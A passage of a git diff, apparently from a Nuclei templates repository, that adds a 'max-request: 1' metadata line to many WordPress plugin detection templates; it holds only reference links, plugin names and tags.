a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ 